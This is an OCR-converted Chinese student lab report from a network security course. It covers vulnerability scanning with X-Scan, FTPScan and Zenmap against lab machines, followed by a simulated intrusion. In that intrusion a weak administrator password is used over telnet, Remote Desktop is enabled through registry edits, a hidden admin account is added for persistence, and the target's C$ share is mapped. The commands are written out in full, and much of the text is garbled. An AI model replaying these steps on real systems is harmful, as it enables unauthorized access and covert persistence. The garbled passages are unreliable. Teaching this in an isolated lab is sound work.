网络安全与信息技术实验探索.docx
南京工程学院实验报告课程名称网络与信息安全技术试验项目名称综合扫描与安全评估/模拟袭击措施试验学生班级网络工程Ill试验学生姓名包立威学号试验时间2023-3-13试验地点信息楼A216试验成绩评估一、试验目日勺1 .熟悉X-Scan工具B¾使用措施2 .熟悉FTPScan工具B使用措施3 .会使用工具查找主机漏洞4 .学会对弱口令的运用5 .理解启动主机默认共享以及在命令提醒下启动服务的措施6 .通过试验理解怎样提高主机的安全性二、试验原理漏洞扫描是一种网络安全扫描技术,它基于局域网或Internet远程检测目的网络或主机安全性。通过漏洞扫描,系统管理员可以发现所维护的Web服务器的多种TCP/IP端口的分派、开放的服务、Web服务软件版本和这些服务及软件呈目前Internet上的安全漏洞。漏洞扫描技术采用积极的、非破坏性的措施来检查系统与否具有安全漏洞。网络安全扫描技术与防火墙、安全监控系统互相配合使用,可以为网络提供很高B¾安全性。漏洞扫描分为运用漏洞库的漏洞扫描和运用模拟袭击的漏洞扫描。漏洞扫描B¾实现措施1漏洞库匹配法2插件技术(功能模块技术)一般帐户包括顾客名及对应的口令。当口令使用简朴的数字和字母组合时,非常轻易被破解,我们称这种口令为弱口令。WindOWS系统存在一种拒绝服务漏洞,由于WindOWS默认启动Bmicrosoft-ds端口(TCP445)容许远程顾客连接。当远程顾客发送一种非法日勺数据包到microsoft-ds端口(TCP445)时,关键资源被LANMAN服务占用,导致拒绝服务袭击,导致蓝屏。X-Scan是国内最著名0综合扫描器之一,它把扫描汇报和安全焦点网站相连接,对扫描到日勺每个漏洞进行“风险等级”评估,并提供漏洞描述、漏洞溢出程序,以便网管测试、修补漏洞,X-SCan采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能,提供了图形界面和命令行两种操作方式,扫描内容包括:远程操作系统类型及版本,原则端口状态及端口BANNER信息,CGl漏洞,11S漏洞,RPC漏洞,SQL-SERVER、FTP-SERVER>SMTP-SERVER>P0P3-SERVERNT-SERVER弱口令顾客,NT服务器NETBIoS信息等。扫描成果保留在/log/目录中,index_*.htm为扫描成果索引文献。ZenmaP是LinUx、FreeBSD>UNIX、WindoWS下的网络扫描和嗅探工具包,其基本功能有三个,一是探测一组主机与否在线;另一方面是扫描主机端口,嗅探所提供的网络服务;还可以推断主机所用的操作系统。ZenmaP不仅可用于扫描仅有两个节点0¾LAN,并且可以扫描500个节点以上的网络。Zenm叩还容许顾客定制扫描技巧。一般,一种简朴0¾使用ICMP协议B¾ping操作可以满足一般需求;也可以深入探测UDP或者TCP端口,直至主机所使用的操作系统;还可以将所有探测成果记录到多种格式的日志中,供深入分析操作。Zenmap不仅能迅速标识出存活的主机,将这些主机上开放的端口及端口关联的服务所有列出,并且不管目的与否修改了系统ICMP响应於JTTL值,它都可以对的地识别出目的操作系统的类型。甚至,使用对应的扫描参数,Zenmap还能穿透对方0防火墙,并且,它尚有某些特殊0¾扫描参数可以让它0扫描活动不会被对方B¾安全设备记录下来,以便袭击者逃避责任。ZenmaP可以在字符终端下通过命令来完毕指定扫描任务,不过这种方式需要我们记住它数量众多的扫描参数,使用起来不是很直观,但灵活性高。假如扫描任务不是很复杂,我们完全可以使用Zenmap日勺图形前端来进行。三、试验规定:1、运用X-Scan工具和FTPScan工具实现扫描。2、运用Zenmap和X-Scan及远程桌面实现模拟袭击。四、试验环节A.本练习主机A、B为一组,C、D为一组,E、F为一组。首先使用“快照X”恢复WindoWS系统环境。一、开放服务扫描(1)设置扫描范围本机进入试验平台,单击工具栏“X-Scan”按钮,启动X-Scano依次选择菜单栏“设置”I“扫描参数”菜单项,打开扫描参数对话框。在“检测范围”参数中指定扫描IP的范围,在“指定IP范围”输入要检测同组主机域名或IP,也可以对多种IP进行检测,例如这样就对这个网段的主机进行检测。这里对单一的IP进行扫描,输入同组主机IP(172.16.0.25)o如图一所示:图一(2)全局设置本机在“全局设置”的“扫描模块”选项里,可以看到待扫描的多种选项,我们先只对开放服务进行扫描,选择“开放服务”选项。如图二所示:图二“并发扫描”选项中可设置线程和并发主机数量,这里选择默认设置。如图三所示:图三“其他设置”选项中,假如对单一主机进行扫描时,一般选择“无条件扫描”选项。如图四所示:图四选择此选项时X-SCan会对目的进行详细检测,这样成果会比较详细也会愈加精确,但扫描时间会延长。当对方严禁ICMP回显祈求时,假如设置了“跳过没有响应H勺主机”选项,X-Scan会自动跳过该主机,自动检测下一台主机。(3)插件设置在''端口有关设置”选项中可以自定义某些需要检测的端口。检测方式有“TCPYSYN”两种,TCP方式轻易被对方发现,精确性要高某些;SYN则相反。我们在这里选用TCP方式。如图五所示:图五(4)开始扫描扫描前请同组主机打开协议分析器,进入“设置”I“定义过滤器”I“选择协议过滤”,设置过滤协议为“"、“FTP”(如图20-1-1),单击“新建捕捉窗口”按钮,点击“选择过滤器”按钮,确定过滤信息。在新建捕捉窗口工具栏中点击“开始捕捉数据包”按钮,开始捕捉数据包。如图六所示:图六设置过滤协议本机设置好X-Scan的有关参数,单击“确定”按钮,然后单击“开始扫描”。X-Scan会对同组主机进行详细检测,扫描过程中假如出现错误会在“错误信息”中看到。(5)结束扫描本机在进行扫描过程中假如检测到漏洞的话,可在“漏洞信息”中查看。如图七所示:IK1C9l<5<ep - >tc>2 l×Jlc9 "*W!SATirli人律刑网京m电/网mr尊& -2tt.0.ia-M2.0.0.ldr .谊”就野亳个内内的主长总 M Mna-WiPWf«. ttRttxizp.(2>全师匕«ff *iM- K M.可 台冷& M%只方开IW多遇行13,电冷-JfO*- -*n意可申比侦RW并友王机就,c<tiftS. “R俭应量” 6中加黑M一主机连行t3ef*“ -Mrm m$HjitJMMXTcsexhw*m GwaAiLwtewoB. Wrwf同会康帕9对力辇止KIP*清次MM<1T Mii.WW! t¾-博斯 IUBgGg堂d SMtMT-giM-IJ» mQ XIT虐出 q图七扫描结束后来自动弹出检测汇报,包括漏洞的信息,以便我们对同组主机进行详细的分析。汇报保留在X-SCan文献夹下FTjlog目录中(C:ExpNISNelAD-LabToolsXScanlog)。汇报中可以查看同组主机中开放的端口以及提供H勺服务。如图八所示:TKM6.Mn0wm11cFBt1».yaaSflum-C图八(6)分析扫描成果本机分析扫描器生成的扫描成果,对存在欧I漏洞进行风险评估。请同组主机停止协议分析器,观测协议分析器中本机与同组主机的会话状况。如图九图十所示:Fm分U HU E0 啊 ©靖 文”(E) n½> 设说D 窗QW mH)-lfl×文件口:未名1序号设地址目的收址 |“夏 J OOOC29-5S8B5 FF7F7-FTFTFF UI>P: POs 137日2S3日4日5172.16.0.144 OOOC29-79AD68 172.16.0.27 OOOC29-641564 172.M.0.1S4 OOoC29XB069 172.16.0.132 OOOC29C8978F 172.16.0.37 OOOC29-558B5 172.16.0.144172.16.0.25$ ”亍FFT FFFF7FX72.16.0.25S rrrrrr-Frr 172.16.0.2SS n 172. U. 0.255 FF7F7F-FTFTFT X72.16.0.255 FETF-FTFFFF 172.16.0.25SIr曲 OLKB«: UDPs POCt 137 XecBiosaaKdix: UDP: Port 137 XeBXoLX OT>P: Pore 137 XetBioseXaBe: gP: Pott 137 XecBloaasXaM: m>P: Port 137 XecBlos_K«&e:> 137 l¼quest, TEwCtion > 137Request. TEanaoceion -> 137ReQuesa Tewsc(iod > 137Rei8tz TcaQSdCUon > 137Rqu3C, Transoccion -> 137Request, Tran3。CuonID mIDTO m帆长阂时间同间相9214:55:34,64518 _J59214:55:34.648150.00;9214: 55:34.653300.OOS9214:SS:34.6S6620.0019214:55:34.656180.0019214:55:35.395250.73*; 9 Mrnz w£ ostiftt<>n« mrrnm *iu<<st - >rGKAC Source OOOC2>SAS8B5 Voieakt U4rt* EtK*rtype - UncOt s OWO I? PrOweI1 ItrMIFvi Qskt4rnt Frtocol version 4)OOOOOO:000010:000020: 000030: 000040: OOOOSO:Wooosl 018 Q 2 4 qF U 9 O 6 1F U 8 O 4 4 "CQg5oF A 9 O 5 3F 3 8 O 4 4 1 - 0 6 1 f 7 O 4 445c84F50 0 0 0 3 5OM-14 4- 6J144- oo445 O D 6 S 1Bl 4 4 彳 O 5'c8o464r8AbA 5 3 OSBE 4 T 2%on ta K«*d«rTBtA 4JWtr 1«IkCUk 20 (field VtlJ 5) of aric 002)Ttl 1A(U 78 2966 and Fraint ffvt Um>S4 0Dm" frgod .0 lr fr)nr . 0 Pr6<N OffMt 0 VQM 0) to Iiw 128 PraX1 7 VDP PrzXOl )Xt4*r Ch<ksm 6?B5(c«nr<«t) Smtc Ue 172.16.0.144 *tintc 4drM 1T2 16 0 255-包 " *r D*,c pr -St¾xce Pge = 137 JtB>oaJ Pret<<l<1 I" I 9 S 3 5 " - S379II11IM的侬 i.jFrwi> ffst 0 (field 疝q 0) t« live 128口 IVSt PrOtoC1 6 TCT ProWcSlMt4<r Chcks 2l7A(conrtel) Sgc< adta 172 16.0.135 (Dtip¾OT 4*s 1T2.16 0 35II 初Xtonlgrt Mcroarf. Il , F¾怜购析.L» 际 JW)150图九口在超文MB 殖欧O 设IhD VCW WihHiB20-1-exs5之3北三凿黑黑滥Ix-M脸136-135-黑Ix-: M111tl9-lx-"¼-禁JjiMC UttiBAtiea 443Ttt-7XI 3c“Q 4ir1t JiaC 2src. 0C0C224tA! Vv>>c*tt 3e Qlhrt* - UACh * 000 U hr*tcal(Mrtkt色H <U<rn Protxl TarnBL 4)-iJVrtea m4 X«»i«r IyU>Vr¾i<a 4J)NEr I”! 20 (fi14 7m S)QTm C Mrvte 005,u IZb » 8 X<kfl¾i* HOTFl*<t a4 ,/.N c”“QUt4 00m' t f*4At !Vr f9M 0Fr.3 0 (ftli Zj 0)T&m t live 128V*t N»lel TCP PrtClM*4r Cbdn 2ITA(c«rr«ei)SBe 44rs = 1T2. IS O BBtbtiM> Mr 1T2.16.0 35Iq 工皿NA设置好防攵11 蟠.把行加由"Mtt niWMt timttft r m士开同d.令S3Iejxft代&0>H&M体¾分析图十I注由于开放服务扫描携带的信息具有随机性和不可见性,因此在协议分析器解析FTP命令时在会话交互图上会出现命令乱码现象,属于正常。”二.漏洞检测脚本扫描(1)本机对扫描器进行设置在“全局设置”I“扫描模块”中只选择“漏洞检测脚本”,其他设置与任务一相似。(2)开始扫描同组主机关闭协议分析器“捕捉窗口”,设置协议分析器的捕捉缓冲区大小为8M,详细操作措施如F:单击菜单栏“设置”,选择“捕捉缓冲区大小”,选择“8M”。如图十一所示:图十一定义过滤器I协议过滤,选择协议"FTPControl”和“FTPData"。如图十二所示: 图十二新建“捕捉窗口”,选择此前设置的过滤器,开始捕捉。本机对同组主机进行扫描。(3)结束扫描本机对扫描器生成的扫描成果进行分析,并根据扫描成果判断X-Scan对同组主机进行了哪些类别的FTP扫描行为。同组主机停止协议分析器并观测两机会话状况。如图十三所示:x*cju½*idwo也.爪小UlaTg也。阳-WPi*GX÷.豆灿MIWiKttil.0博惊税-FTFCaM0lSPRr*t«-IP三".tfiHRuxmwnias.(3>U>USWgI,不?分5*.mwNMR<xUBff*MF11mrf.网/王帆Q止械的Mcl鼻及mv情代以3.口”图十三三.弱口令扫描本环节由学生自行操作FTPScan对同组主机进行FTP弱口令扫描,对FTPScanH勺使用格式为:即scan.exe同组主机IP地址100(IOo为线程数,可自选参数)。扫描成果保留在C:ExpNISNetAD-LabToolsFtpScanftpscan.txt中。如图十四所示:Sdmla王机出7w*o11mflk9.网也主机停止野及分桑邦双En色偏收仪三.口令日*为由转LgOIBRTP攵at向主惟HTEiiCJ今13*计3?SeZ)Ie用或分,CRedxmK0P*IOD(103MR.11tt11三ClUQIIlZK4LtbT8l5Rc5Cw<«utr*EegIirKT2由记分&±2!G.3%>*>ummt.JlC*VO0WcyvME"B.试验环节图十四本练习主机A、B为一组,C、D为一组,E、F为一组。试验中主机A、B同步对同组主机进行试验操作,下面以主机A为例,阐明试验环节。首先使用“快照X”恢复Windows系统环境。一.初步扫描(1)主机A点击工具栏“Zenmap”按钮启动Zenmap工具,在“Target”中输入同组主机B的IP地址,在“Profile”中选择“Intensescan”,点击右侧的“Scan”按钮,开始扫描。如图一所示:图一(2)主机A分析扫描成果,从扫描成果中可以理解到主机B开放TCP端口,使用的是MicrosoftWindows2023操作系统,确定具有袭击价值。扫描的部分成果如下:Scanning172.16.0.681000portsDiscoveredoDiscoveredopenport1025/tcpDiscoveredoDiscoveredDiscoveredDiscoveredDiscoveredoDiscoveredopenpDiscoveredopDiscoveredopPORTSTATESERVICEVERSION21/tcpopenftpMicrosoftftpdftp-anon:AnonymousFTPloginallowed23/tcpopentelnetMicrosoftWindowsXPtelnetd80/tcpopenMicrosoftIISwebserver6.0_html-title:WebxB7xFExCExFlxB2xE2xCAxD4xD2xB3135/tcpopenmsrpcMicrosoftWindowsRPC139/tcpopennetbios-ssn445/tcpopenmicrosoft-dsMicrosoftWindows2023microsoft-ds1025/tcpopenmsrpcMicrosoftWindowsRPC1029/tcpopenmsrpcMicrosoftWindowsRPC3306/tcpopenmysqlMySQL(unauthorized)二.深入扫描(1)主机A点击工具栏"X-Scanw按钮启动X-SCan,点击菜单栏中的“设置”按钮,在弹出菜单中点击“扫描参数”,在“检测范围”中填写主机B的IP,展开左侧树状接口中的“全局设置”在“扫描模块”选项中分别勾选“开放服务”、“NT-Server弱口令”、“NetBios信息”三个选项,其他选项为空,点击“确定”按钮,完毕扫描参数设定,如图二所示。图二扫描模块设置(2)主机A点击开始进行扫描。扫描结束后,自动弹出检测汇报。主机A分析扫描成果,主机B开放了23端口,可以进行nel连接。在139端口中的NelBios信息里可以看到主机B的账户信息,并且发现了存在弱口令漏洞的test账户信息,账户类型为管理员(Adniiniistrator)密码为test/1234。如图三所示:图三检测成果列表三.启动远程桌面服务1 .主机A尝试使用“远程桌面”远程登录主机B:主机A点击工具栏中“远程桌面”按钮,打开远程桌面连接,尝试登录主机B,在远程桌面中输入主机BMHP,点击“连接”按钮,由于主机B没有启动远程桌面的服务,成果出现了“客户端无法连接到远程计算机”的提醒,远程登录失败。如图四所示:图四登录失败2 .主机A使用telnet登录主机B:主机A依次点击“开始”I“运行”I“Cmd”进入命令行,在命令行输入“net主机B的IP”,在弹出提醒中输入“n”。如图五所示:图五在弹出的telnet欢迎界面中输入前面环节中已经扫描出的顾客名和密码,若登录成功则出现如下提醒:图六登录成功3 .通过修改注册表启动主机B远程桌面:主机A登录成功后在命令提醒符下执行“regquery"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer",查看执行成果,fDenyTSConnections时值为REG_DWORD0x1。如图七所示:lwbw<1r/.lKJUA*pri<yIHV-lX>Ol-HCfMFJCVT9tM*rM*Cv*n.r*l11A*4nwt1Tr4ca1金vvt7.,u4n«Ca“nws 377: isCvlSXcu>U US:、)29qu«ryFHCKMLNACHIMEM;YVl£HM;uj*ireACControlecM>ncroIMemlnalSeX<KEY_LOOftu_HhCHlHENs£u.*-r«:aitCunLrvlSvKJu<jMC4-Ml×T*f*av*l9rvrFItraCCuAtItatiGFccItoSlee-ppXEGDMOKDxJleGWlr>g<lKKKfcGMULIlSZ11uIflTechHuIrWodeA9tlZIO4×MI*ilCle<卜rieinftrifaKT曲34r×Mm,i£hm2nr4>itn<TMhENll34ZhMM<七Tcc(2034XAM)<iT««;l.247.WrfzuQBup<EIvcpTlMHilliuvt:KECDWORDOxlNlItCouncrHgPcdSXccpli6dm叩RtXJHMQXDIbCrUrltalilaTSCCIVmrAbMtGMM>MUMxlZltuTF4EQ"Ex4RJlFXJJBUOWhAwIY)UfT0IKFCJUOgAmIfPvnvISCumw<IvhvREGDHOMOa!rw*4Mctvrio11u>.zIUAdvnrr1RIX;12"HteH114e1K4c*Fw1C*M*ttn*xOjMeoIlf>YR0”,deytMC-ItMOvIDARfeGDVORPOxi13lH"JLc4bHN»XPWQNPHCS1n4kSflccIonlaRr4l*rItlx)_MOIlH*R耳g,i”一HFQnunnAmifAlUwTwOrC¼flMRFCJDMOfmnfilHLYIAKALHRCHILNMrrf<Conrr«letSjUoncroIMerninAlServe1MM<Aln4,l<EY_LOCUJWICIiIMES«ZSSTFttMIiav>r«mcCnnfcr«lH4»eCn«ew»1Tlc4ca1太vwA,卜cg,Nrlic«tit*<KEY_LOCOL_RACHtMESYSTENu>-v>ilCutLrwUvSCuwmlxXteri*BlSvs*-MWfmIlUyvroflgurv3nn<rr1>00UMACHIHESSYXIbn'Jre<tContr>ieesconcoIMemlnlerverPoKJf_T4K3ftU_-IWdlIWF*45Y5TF>>r<CCnnfcrlfleslnetlT*t+ca1MtvvFCPMeUMUirxmiKY-OCL-KCHtttEV8IEHtrvCMlrx>18<rCXCumC<avlXv*viaa*t1零CraVcAVXKV"13ul7ThKHApplnjIKWJLUOU.J«RCII(MLS>Y:tLt9>Cu*re*CConrMlUeCM>ACi*<>XMernlnaiSBrveblcenln«CeKm vaVMaXnyMrw*zM 8czs3l £1X1 Xe?VerverMJJMU q.E.vM>d.Mr*rMinSAr. 8图七远程桌面未启动主机A在命令提醒符下执行“regdelete"HKEY_LOCAL_MACHINESYSTEMCuentControlSetControlTerminalServer"vFDenyTSConnections",删除该键值,如图八所示:;:、>r«9deleteFKfeYLOCALMQI1NlM>ystnCUrrent<a)nc>M>ISetMantral×Xelltier,.>"vrAcyTS<>fmcr,OOSWjMji'册逑值ShimvTSiCfwfcN<V>?y.,7.->图八删除注册表值主机A新建一种(DenyTSConnections值为O的!注册表项,在命令提醒符下执行"regadd'HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer"vfDenyTSConnections/lREG_DWORD/dO"确定,操作成功,如图九所示:C:、r<9AddXlCIYLOCALMCHIMlMiYKlHMu>refttCCM*et>JCon<roIMemlnAlVervemZIOenyYS(bfoct11McZtRIGJKAOKP/4W模十或N?Fty,图九新建注册表值主机A确定修改与否成功,在命令提醒符下再次执行regqueryServer""HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTenninal命令,SfDenyTSConnections,FDenyTSConnectionsvBfi¾REG_DWORDOxOo如图十所示:5>rc<jMueryFKlYWCftLNnCHNEMCIEHyurE<C<meHgm5XxI"nlZScrvHFYJTWsmttCfmtrlfttxnatmlTami11lSarvurcMimgvQUIoSIu3呷>RECgORDxfFWtkRyWithX邺XKEGKULIiSZ11ullXTchHullin&denNIZBJiNuiCiJe<hHultinodeeHI2KJ4XWaMu“hKl2M11«hmUiJ4ZlM<SMHuItltechZtIXWL)tivchNm也m<WlU,2副I濯1Mia«InHillixm:RFCJuORDAxlNlhcvMlAuQPcykiRlvcyBNQyHHECWORDBxNMtAMeTgSFeE岫MkGWQKD«xlXl"lrvpaLnGnIb(代NtLG30XUHiBjKM>(tDAxlPruiluclUMrxiunRFCeJtXS.2ISndvurllrt:RCDWRDDxBIdieMlnKtacIonPoolCuncMtXiWOHUIrXM18即5吐m/JDWOIIMITflFnAhUHKFJ11BRDAxlIgVy"Eyl1<tlRfXI.W01DRfSiimIcScYsiicHiPcrUacrR£CDWRD以rin«ibIeValenXfeGDMUKDHXImXo&ekIpRCJGJDUORnHMIH11vTSCMnctin>RfX一MloROS4图十主机A再次使用远程桌面连接主机B,连接与否成功是。注主机A使用远程桌面连接主机B后,便可对主机B进行任何操作,此处不做演示,同学可以自行试验。四.建立新顾客使用目前获得的账户登录主机B并对其进行操作难免会被察觉,因此主机A需要建立自己的账户,以便后来对主机B的控制。(1)主机A再次使用“test”账户用“telnet”命令登录主机B,并在命令提醒符下执行unetusermyadmin1234/add,myadmin,为顾客名,“1234”为密码。如图H所示:3"M><Jit1214zMtl火?欣J元用'图十一新建顾客(2)主机A将test顾客添加到administrators组中,在命令提醒符下执行“netIocalgroupadministratorsmyadmin/add如图十二所示:C:DocunentsandSettingstest>netIocalgroupadministratorsmyadmin/add命令成功完成。图十二添加顾客到管理员组(3)主机A使用“myadmin”账户远程桌面登录主机B,查看效果。五.添加磁盘映射为了以便后来对主机B的磁盘文献进行操作,主机A需要将主机B的磁盘映射至本机上。(1)主机A使用“myadmin”账户telnet登录主机B,在命令提醒符下输入netsharec$=c:Zgrantimyadmin,full,将主机B中的C盘映射为C$,并赋予完全控制权限,如图十三所示:>netsharec$-c三/grantXnyadnin,full:$共享成功。图十三添加共享(2)主机A退出telnent,并与主机B建立ipc连接,主机A在命令提醒符下输入“netUSe炷机BRIPXipcS"1234”/user:"myadmin"”如图十四所示:注删除ipc连接使用命令"neluseW主机BH<JIPipcSdelw命令。C:ExpNIS>netuse172.16.0.250ipc$,1234'*/usei»”myadmin”命令成功完成。图十四建立ipc$空连接(3)主机A继续执行命令"netusez:主机B的IPc$”将主机B开放的默认共享C盘映射为自己的当地磁盘Z,如图十五所示,这样,操作自己的Z盘就是操作主机B的C盘。I注断开映射使用“netusez:/del”命令。建立磁盘映射必须先建立ipc连接,要映射成的磁盘必须是主机A当地不存在的盘符,例如,当地磁盘已经存在D盘,就不能再将目的主机的某个磁盘映射成主机A的D盘了。C:E×pNIS>netusez:172.16.0.250c$命令成功完成。图十五将目的C盘映射至当地Z盘(4)主机A打开“我H勺电脑”查看新增长的网络驱动器Z盘,如图十六所示,并尝试对Z盘的文献进行增、册k改操作。网络斐动器ZT72.16.0.25(T上的c$ CZ:)网络驱动器4 .87 GB1.59 GB图十六映射成功五、思索问题1.论述提高主机安全性的措施。1 .使用安全系数高的密码2 .做好边界防护3 .升级您的J软件4 .关闭没有使用0服务5 .使用数据加密6 .通过备份保护数据7 .加密敏感通信8 .不要信任外部网络9 .使用不间断电源支持10 .监控系统的安全与否被威胁和侵入2.寻找袭击目的的一般措施有哪些(至少说出三种)。(1)假如是一种网站,可以通过WhoiS域名查询或WhereiSiP等软件来得到它们B¾IP地址;还可以通过ping命令,查询某个域名B¾IP地址;Windows系统下还可以通过使用路由跟踪命令tracert找到某个目的日勺IP地址。(2)假如袭击者懂得目的所在地区的大概位置,以及目的使用的IPS名称,就可以通过搜索引擎得到这个区域所对应的IPS分派的整个IP地址段。他们还可以到负责分派某个区域IP地址的网站,例如(负责亚洲地区IP地址分派的组织APNICB网站),在这个网站中,就可以查询到我国电信、铁通和网通0IP地址分派表。(3)袭击者可以制作一种钓鱼网站,然后以诱骗网络顾客的方式来获得一般顾客的IP地址。(4)袭击者也可以运用即时聊天软件,如等,然后使用如显IPW外挂就可以懂得与他聊天的任何一种好友所使用的IP地址。(5)目前,袭击者更喜欢用社会工程方式来得到某个机构或个人0IP地址。还可以通过向其他黑客购置B¾方式得到。六试验总结通过本次试验,我熟悉X-Scan和FTPScan工具0¾使用措施,会使用工具查找主机漏洞,学会对弱口令B¾运用,理解启动主机默认共享以及在命令提醒下启动服务的措施,通过试验理解怎样提高主机的安全性。通过试验,我们可以理论联络实际,加深我们对理论知识的理解,更好的将理论运用到实践中去。七、教师评阅:90-95分:试验课前做了充足的准备工作,与专业有关知识能紧密联络。试验汇报条理清晰,书写规范,图文并茂,汇报内容全面,重要内容论述详细。认识体会深刻,起到了试验的目的。80-85分:试验课前做了充足的准备工作,与专业有关知识能较紧密联口络。试验汇报条理清晰,书写规范,图文并茂,汇报内容较全面,重要内容论述较详细。认识体会较深刻,到达了试验的作用。70-75分:试验课前准备较充足,与专业有关知识能基本能联络,试验汇报条理清晰,书写较规范,汇报内容较全面,能用部分图片展示有关内容,重要内容论述较详细。认识体会较深刻,到达了试验日勺目的。60-65分:试验课前准备不够充足,与专业有关知识不能紧密联络。试I1验汇报条理基本清晰,书写基本规范,汇报内容基本全面,重要内容论述基本详细。认识体会不太深刻,基本到达试验的目的。